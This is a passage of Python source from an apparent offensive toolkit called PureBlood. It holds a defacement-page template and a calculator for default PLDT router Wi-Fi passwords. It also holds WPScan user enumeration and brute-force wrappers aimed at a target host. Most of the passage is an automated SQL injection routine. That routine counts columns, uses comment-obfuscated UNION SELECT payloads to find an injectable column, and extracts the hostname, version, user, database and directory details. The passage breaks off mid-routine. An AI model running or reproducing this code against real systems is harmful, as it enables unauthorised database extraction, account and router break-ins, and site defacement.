<p class=\"groups\">Greetings: {8}</p>
</center>
</div>
</body>
</html>
'''.format(title, shortcut_icon, meta_description, meta_image, logo, hacker_name, message1, message2, groups, '@import')
self.deface_page_result = deface_page_template
return self.deface_page_result
def password_generator(self, length, text):
password_generator_final1 = ''
password_generator_final2 = ''
password_generator_final3 = ''
chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()-_=+[{}];:\'"\|,<.>/?`~'
for i in range(length):
char_random = random.choice(chars)
password_generator_final1 += char_random
password_generator_final2 = hashlib.md5(text.encode('utf-8')).hexdigest()
l33t_alphabet = ['4','8','(','|)','3','|=','9','#','1','_|','|<','|_','|\/|','|\|','0','|D','(,)','|2','$','7','|_|','\/','\/\/','><','\'/','(/)']
for i in text:
if i == 'a' or i == 'A':
text = text.replace('a', l33t_alphabet[0]).replace('A', l33t_alphabet[0])
elif i == 'b' or i == 'B':
text = text.replace('b', l33t_alphabet[1]).replace('B', l33t_alphabet[1])
elif i == 'c' or i == 'C':
text = text.replace('c', l33t_alphabet[2]).replace('C', l33t_alphabet[2])
elif i == 'd' or i == 'D':
text = text.replace('d', l33t_alphabet[3]).replace('D', l33t_alphabet[3])
elif i == 'e' or i == 'E':
text = text.replace('e', l33t_alphabet[4]).replace('E', l33t_alphabet[4])
elif i == 'f' or i == 'F':
text = text.replace('f', l33t_alphabet[5]).replace('F', l33t_alphabet[5])
elif i == 'g' or i == 'G':
text = text.replace('g', l33t_alphabet[6]).replace('G', l33t_alphabet[6])
elif i == 'h' or i == 'H':
text = text.replace('h', l33t_alphabet[7]).replace('H', l33t_alphabet[7])
elif i == 'i' or i == 'I':
text = text.replace('i', l33t_alphabet[8]).replace('I', l33t_alphabet[8])
elif i == 'j' or i == 'J':
text = text.replace('j', l33t_alphabet[9]).replace('J', l33t_alphabet[9])
elif i == 'k' or i == 'K':
text = text.replace('k', l33t_alphabet[10]).replace('K', l33t_alphabet[10])
elif i == 'l' or i == 'L':
text = text.replace('l', l33t_alphabet[11]).replace('L', l33t_alphabet[11])
elif i == 'm' or i == 'M':
text = text.replace('m', l33t_alphabet[12]).replace('M', l33t_alphabet[12])
elif i == 'n' or i == 'N':
text = text.replace('n', l33t_alphabet[13]).replace('N', l33t_alphabet[13])
elif i == 'o' or i == 'O':
text = text.replace('o', l33t_alphabet[14]).replace('O', l33t_alphabet[14])
elif i == 'p' or i == 'P':
text = text.replace('p', l33t_alphabet[15]).replace('P', l33t_alphabet[15])
elif i == 'q' or i == 'Q':
text = text.replace('q', l33t_alphabet[16]).replace('Q', l33t_alphabet[16])
elif i == 'r' or i == 'R':
text = text.replace('r', l33t_alphabet[17]).replace('R', l33t_alphabet[17])
elif i == 's' or i == 'S':
text = text.replace('s', l33t_alphabet[18]).replace('S', l33t_alphabet[18])
elif i == 't' or i == 'T':
text = text.replace('t', l33t_alphabet[19]).replace('T', l33t_alphabet[19])
elif i == 'u' or i == 'U':
text = text.replace('u', l33t_alphabet[20]).replace('U', l33t_alphabet[20])
elif i == 'v' or i == 'V':
text = text.replace('v', l33t_alphabet[21]).replace('V', l33t_alphabet[21])
elif i == 'w' or i == 'W':
text = text.replace('w', l33t_alphabet[22]).replace('W', l33t_alphabet[22])
elif i == 'x' or i == 'X':
text = text.replace('x', l33t_alphabet[23]).replace('X', l33t_alphabet[23])
elif i == 'y' or i == 'Y':
text = text.replace('y', l33t_alphabet[24]).replace('Y', l33t_alphabet[24])
elif i == 'z' or i == 'Z':
text = text.replace('z', l33t_alphabet[25]).replace('Z', l33t_alphabet[25])
password_generator_final3 = text
self.password_generator_result1 = password_generator_final1
self.password_generator_result2 = password_generator_final2
self.password_generator_result3 = password_generator_final3
return self.password_generator_result1, self.password_generator_result2, self.password_generator_result3
def pldt_password_calculator(self, digit5, mac5):
pldt_password_calculator_final1 = ['PLDTWIFI' + digit5, 'pldtwifi'+ digit5]
pldt_password_calculator_final2_multiply = digit5 * 3
pldt_password_calculator_final2 = ['PLDTWIFI' + pldt_password_calculator_final2_multiply, 'pldtwifi' + pldt_password_calculator_final2_multiply]
digit55 = digit5
for i in digit55:
if i == '0':
digit55.replace('0', 'f')
elif i == '4':
digit55.replace('4', 'b')
elif i == '8':
digit55.replace('8', '7')
elif i == 'c':
digit55.replace('c', '3')
elif i == '1':
digit55.replace('1', 'e')
elif i == '5':
digit55.replace('5', 'a')
elif i == '9':
digit55.replace('9', '6')
elif i == 'd':
digit55.replace('d', '2')
elif i == '2':
digit55.replace('2', 'd')
elif i == '6':
digit55.replace('6', '9')
elif i == 'a':
digit55.replace('a', '5')
elif i == 'e':
digit55.replace('e', '1')
elif i == '3':
digit55.replace('3', 'c')
elif i == '7':
digit55.replace('7', '8')
elif i == 'b':
digit55.replace('b', '4')
elif i == 'f':
digit55.replace('f', '0')
pldt_password_calculator_final3 = 'wlan' + digit55
pldt_password_calculator_final4 = ['PLDTWIFI' + digit55, 'pldtwifi' + digit55]
pldt_password_calculator_final5 = 'HomeBro_' + mac5
self.pldt_password_calculator_result1 = pldt_password_calculator_final1
self.pldt_password_calculator_result2 = pldt_password_calculator_final2
self.pldt_password_calculator_result3 = pldt_password_calculator_final3
self.pldt_password_calculator_result4 = pldt_password_calculator_final4
self.pldt_password_calculator_result5 = pldt_password_calculator_final5
return self.pldt_password_calculator_result1, self.pldt_password_calculator_result2, self.pldt_password_calculator_result3, self.pldt_password_calculator_result4, self.pldt_password_calculator_result5
def text_to_hash(self, text):
md5_final = hashlib.md5(text.encode('utf-8')).hexdigest()
sha1_final = hashlib.sha1(text.encode('utf-8')).hexdigest()
sha224_final = hashlib.sha224(text.encode('utf-8')).hexdigest()
sha256_final = hashlib.sha256(text.encode('utf-8')).hexdigest()
sha384_final = hashlib.sha384(text.encode('utf-8')).hexdigest()
sha512_final = hashlib.sha512(text.encode('utf-8')).hexdigest()
md4 = hashlib.new('md4')
md4.update(text.encode('utf-8'))
md4_final = md4.hexdigest()
ripemd160 = hashlib.new('ripemd160')
ripemd160.update(text.encode('utf-8'))
ripemd160_final = ripemd160.hexdigest()
whirlpool = hashlib.new('whirlpool')
whirlpool.update(text.encode('utf-8'))
whirlpool_final = whirlpool.hexdigest()
text_to_hash_final = """
Text To Hash Result:
[+] MD4: {0}
[+] MD5: {1}
[+] SHA1: {2}
[+] SHA224: {3}
[+] SHA256: {4}
[+] SHA384: {5}
[+] SHA512: {6}
[+] RipeMD160: {7}
[+] Whirlpool: {8}
""".format(md4_final, md5_final, sha1_final, sha224_final, sha256_final, sha384_final, sha512_final, ripemd160_final, whirlpool_final)
self.text_to_hash_result = text_to_hash_final
return self.text_to_hash_result
class WebApplicationAttack:
def wp_scan(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_user_range = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_user_range = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}User Range[EX: 1-20]{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 -e u['+wp_scan_user_range+'],p,tt', shell=True)
except Exception as e:
print ('[!] - Error: {e}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
def wp_scan_bruteforce(self, url):
wp_scan_test_ruby_command = subprocess.call('ruby -v', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_test_ruby_command == 0:
pass
elif wp_scan_test_ruby_command == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install ruby first!{0}'.format(reset, red, blue, yellow))
print ('Ruby Installer: https://rubyinstaller.org/')
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
if not os.path.exists('external/wpscan-master'):
wp_scan_download_curl = subprocess.call('curl -LO https://github.com/wpscanteam/wpscan/archive/master.zip', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_curl == 0:
wp_scan_unzip = zipfile.ZipFile('master.zip', 'r')
wp_scan_unzip.extractall('external/')
wp_scan_unzip.close()
os.remove('master.zip')
elif wp_scan_download_curl == 1:
if os.path.exists('external/wpscan'):
os.rename('external/wpscan', 'external/wpscan-master')
else:
wp_scan_download_git = subprocess.call('cd external/ && git clone https://github.com/wpscanteam/wpscan', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan_download_git == 0:
os.rename('external/wpscan', 'external/wpscan-master')
elif wp_scan_download_git == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install curl or git for windows first!{0}'.format(reset, red, blue, yellow))
print ('Tutorial: http://www.oracle.com/webfolder/technetwork/tutorials/obe/cloud/objectstorage/restrict_rw_accs_cntainers_REST_API/files/installing_curl_command_line_tool_on_windows.html')
time.sleep(2)
print ('')
web_application_attack()
else:
pass
wp_scan = subprocess.call('ruby external/wpscan-master/wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
else:
wp_scan = subprocess.call('wpscan --version', shell=True, stdout=FNULL, stderr=subprocess.STDOUT)
if wp_scan != 0:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan\'s dependencies first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
else:
pass
if wp_scan == 0:
pass
elif wp_scan == 1:
print ('\n{2}[{1}!{2}] {3}- {1}Please install wpscan first!{0}'.format(reset, red, blue, yellow))
print ("""
Linux / MAC OS:
https://wpscan.org
Android:
Termux / GNURoot
Windows:
http://www.seoeditors.com/expert-seo/how-to-install-wpscan-on-windows-10
https://blog.dewhurstsecurity.com/2017/05/03/installing-wpscan-on-windows-10.html
Kali Linux:
sudo apt-get install wpscan""")
time.sleep(2)
print ('')
web_application_attack()
if platform.system() == 'Windows':
print ('[#] - Updating WPScan:')
subprocess.call('ruby external/wpscan-master/wpscan --batch --no-banner --no-color --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
else:
print ('[#] - Updating WPScan:')
subprocess.call('wpscan --batch --no-banner --update --disable-tls-checks', shell=True)
print ('\n[#] - Running WPScan:')
if sys.version_info[0] == 3:
wp_scan_brutefoce_username = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
elif sys.version_info[0] == 2:
wp_scan_brutefoce_username = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Username{1})> {2}'.format(green, blue, cyan, red)))
wp_scan_bruteforce_password = str(raw_input('{0}PureBlood{1}>{0}WebApplicationAttack{1}>{0}WPScan({3}Set Password List{1})> {2}'.format(green, blue, cyan, red)))
try:
subprocess.call('ruby external/wpscan-master/wpscan -u '+hostname+' -r --batch --no-banner --verbose -t 500 --wordlist '+wp_scan_bruteforce_password+' --username '+wp_scan_brutefoce_username, shell=True)
except Exception as e:
print ('[!] - Error: {0}'.format(e))
time.sleep(2)
print ('')
web_application_attack()
print (reset)
print ('{0}='.format(red) * int(sizex))
web_application_attack()
def auto_sql_injection(self, url):
print ('[#] - Auto SQL Injection Running on -> {0}'.format(url))
auto_sql_injection_request_origin = requests.get(url)
auto_sql_injection_request_origin_html = BeautifulSoup(auto_sql_injection_request_origin.text, 'html.parser')
auto_sql_injection_request_origin_html_h1 = auto_sql_injection_request_origin_html.find_all('h1')
auto_sql_injection_request_origin_html_h2 = auto_sql_injection_request_origin_html.find_all('h2')
auto_sql_injection_request_origin_html_h3 = auto_sql_injection_request_origin_html.find_all('h3')
auto_sql_injection_request_origin_html_p = auto_sql_injection_request_origin_html.find_all('p')
print ('[~] - Checking If Vulnerable')
auto_sql_injection_request = requests.get('{0}\''.format(url))
auto_sql_injection_request_url = '{0}\''.format(url)
auto_sql_injection_request_result = ''
auto_sql_injection_request_i = ''
if auto_sql_injection_request.status_code == 200:
for db, errors in dbms_errors.items():
for error in errors:
if re.compile(error).search(auto_sql_injection_request.text):
error = re.compile(error)
auto_sql_injection_request_result = 'Vulnerable1'
print ('[+] - Vulnerable: Database -> ({0})'.format(db))
if auto_sql_injection_request_result == '':
if auto_sql_injection_request_origin.text != auto_sql_injection_request.text:
auto_sql_injection_request_result = 'Vulnerable2'
print ('[+] - Vulnerable: NO Syntax Error')
elif auto_sql_injection_request.status_code == 403:
print ('[!] - Not Vulnerable!')
elif auto_sql_injection_request.status_code == 406:
print ('[!] - Not Vulnerable!')
if auto_sql_injection_request_result == 'Vulnerable1':
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
if ' order by 1--' in auto_sql_injection_request_orderby.text or 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, '100'))
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
elif 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err2'
else:
auto_sql_injection_orderby_result = 'err3'
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err2':
if 'mysql_fetch_row()' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_orderby_result == 'err1':
if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[~] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Able to Find The Vulnerable Column!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
